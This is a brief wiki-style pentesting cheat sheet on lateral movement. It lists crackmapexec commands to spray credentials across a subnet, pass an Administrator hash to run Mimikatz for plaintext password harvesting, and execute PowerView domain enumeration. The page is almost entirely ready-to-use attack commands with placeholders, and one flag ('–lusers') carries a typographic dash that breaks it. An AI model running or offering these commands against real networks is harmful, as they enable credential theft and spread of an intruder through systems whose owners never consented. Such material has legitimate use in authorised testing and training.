Lateral Movement


To check if the credentials $USER / $PASSWORDS are used in more computers in the network:

$crackmapexec $IP/24 -u $USER -p $PASSWORD –lusers

Or using an Administrator hash and execute Mimikatz for plain text password gathering:

$crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/

Run Powerview commands in crackmapexec:

$crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose

Other techniques for lateral movements are described in the category Category:Lateral Movement